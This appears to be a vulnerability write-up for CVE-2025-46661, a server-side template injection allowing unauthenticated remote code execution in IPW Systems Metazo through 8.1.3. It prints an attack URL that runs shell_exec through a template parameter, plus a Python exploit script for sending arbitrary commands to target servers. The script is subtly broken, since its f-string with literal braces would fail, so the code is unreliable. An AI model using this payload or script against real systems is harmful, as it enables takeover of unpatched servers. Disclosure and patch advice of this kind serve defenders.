CVE-2025-46661 - Unauthenticated Remote Code Execution (RCE) Vulnerability in IPW Systems Metazo up to 8.1.3 via Server-Side Template Injection

A critical vulnerability, assigned with CVSSv3 score 9.8, has been discovered in IPW Systems Metazo through 8.1.3 which allows for unauthenticated remote code execution (RCE). The vulnerability exists due to a server-side template injection issue in the smartyValidator.php file, which could be exploited by an attacker to provide arbitrary template expressions to the Smarty templating engine. This vulnerability has been patched by the vendor, IPW Systems.

Affected Products

IPW Systems Metazo versions up to and including 8.1.3.

Vulnerability Details

The vulnerability exists in the smartyValidator.php file, specifically in the IPW_AXAJ_Utility::isAjaxRequest(), IPW_AjaxProcessor::initiate(), and IPW_AjaxProcessor::_run(). The insecure handling of user input allows the attacker to inject custom Smarty template expressions, leading to remote code execution.

To successfully exploit this vulnerability, an attacker must send a specially crafted HTTP request with the payload to the target server. An example payload could look like this:

http://target-server/smartyValidator.php?action=IPW_AjaxProcessor.initiate&template={$some_var=print(shell_exec('id'))}

Exploit Code Snippet

The following is a basic example of a Python script that can be used to exploit vulnerable instances of IPW Systems Metazo through 8.1.3:

import requests

def exploit_metazo(target_url, command_to_execute):
    payload = f"{$some_var=print(shell_exec('{command_to_execute}'))}"
    params = {"action": "IPW_AjaxProcessor.initiate", "template": payload}
    
    try:
        response = requests.get(target_url + "/smartyValidator.php", params=params)
        if response.status_code == 200:
            print("Exploit executed successfully!")
            print(response.text)
        else:
            print(f"Error executing exploit: HTTP status {response.status_code}")
    except Exception as e:
        print("Error executing exploit:")
        print(str(e))

if __name__ == "__main__":
    target_url = "http://target-server";  # Change this to the target server URL
    command_to_execute = "id"  # Change this to the command you want to execute
    exploit_metazo(target_url, command_to_execute)

Vendor Response

IPW Systems has acknowledged the issue and released a patch to mitigate the vulnerability in all instances running Metazo. Users are advised to contact their supplier for an updated version or follow the instructions provided by IPW Systems to update their platform to version 8.1.4 or later.

Original References

- CVE-2025-46661
- IPW Systems Security Advisory

Recommendations

- Update the IPW Systems Metazo to the latest version (8.1.4 or later) as soon as possible to mitigate the risk of remote code execution.

Monitor any logs for unusual activity that may indicate attempts to exploit this vulnerability.

- Implement a system of regular security audits to ensure that your systems are up to date with the latest patches and security best practices.

Conclusion

In conclusion, CVE-2025-46661 is a dangerous vulnerability in IPW Systems Metazo through 8.1.3 that enables an attacker to remotely execute code without needing to authenticate. This potentially allows the attacker full access to the underlying system. IPW Systems has since patched the vulnerability, and it is recommended that affected users update their systems as soon as possible to protect against this threat.

Timeline

Published on: 04/28/2025 13:15:24 UTC
Last modified on: 04/29/2025 13:52:10 UTC